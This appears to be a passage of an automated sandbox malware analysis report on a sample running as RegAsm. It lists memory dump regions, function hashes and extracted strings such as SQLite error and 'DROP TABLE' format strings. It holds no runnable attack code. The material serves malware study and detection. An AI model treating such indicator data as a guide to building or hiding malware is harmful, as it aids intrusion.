                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF01D4359801787BCF116A559C15DCA3E1AEBC0FA1F4D4021FE5C26250D6725879D6C0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1984F752
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                                                                                                                                                                                                              • API String ID: 0-2071071404
                                                                                                                                                                                                                                                              • Opcode ID: e733389c6866d0e8dbe93ce74215779028dc057d0c4acd3c7794ca1e2a140456
                                                                                                                                                                                                                                                              • Instruction ID: 7c2bf0acdf019ea7fb8c59efcf4cc0e998f7d1a1a640fa51aeb4f550efefeef2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e733389c6866d0e8dbe93ce74215779028dc057d0c4acd3c7794ca1e2a140456
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211E7B5600150AFE2005B3CDCCDF6733ACEF40645F19412DFD0AC3180E728B85AC662
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040DC16
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D055
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: __CxxThrowException@8.LIBCMT ref: 0041D06A
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D07B
                                                                                                                                                                                                                                                              • memmove.MSVCRT ref: 0040DC4F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • invalid string position, xrefs: 0040DC11
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                                                                              • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                              • Opcode ID: bb872e9de1a3b33013f2610b99193ba1a90415cca5a6cbadb9b90b2bf8b44de4
                                                                                                                                                                                                                                                              • Instruction ID: 3d509136ada29309dc7422f2d55f03f2458e4716739bc56107e598546c963ef4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb872e9de1a3b33013f2610b99193ba1a90415cca5a6cbadb9b90b2bf8b44de4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E01B5717082104BE7248DA8D9C4827B7A6EBC6714720493EE481D7685DBF9EC4AC7AC
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: F$YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-79577134
                                                                                                                                                                                                                                                              • Opcode ID: c80ef3dcdb0c159442a3bdb7db8fca2a4673cb19ed67ad2d84e36393b4515d7f
                                                                                                                                                                                                                                                              • Instruction ID: ca283b9e5ee49c5401d7bc8027ffe4bcbd2ffaaece6ba14b957444dfcc7c976e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c80ef3dcdb0c159442a3bdb7db8fca2a4673cb19ed67ad2d84e36393b4515d7f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 641158B59083869FD700CF29C440B1BBBE8AF94614F48891DF98997390E735E988CF93
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-2530468415
                                                                                                                                                                                                                                                              • Opcode ID: b8625a7db68342bff8a35cbcbf5d8e2c2d77521cee3ff44fe61fdf0be2640aa2
                                                                                                                                                                                                                                                              • Instruction ID: 9970271ac0ddaca9733a29b8d438841eb4a6a1d765c3cd35d28bb9b6957c00c6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8625a7db68342bff8a35cbcbf5d8e2c2d77521cee3ff44fe61fdf0be2640aa2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3C02221184308E2C700DA68AC01CC927206FD0E00F9C8028A2280A0829220809C8282
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%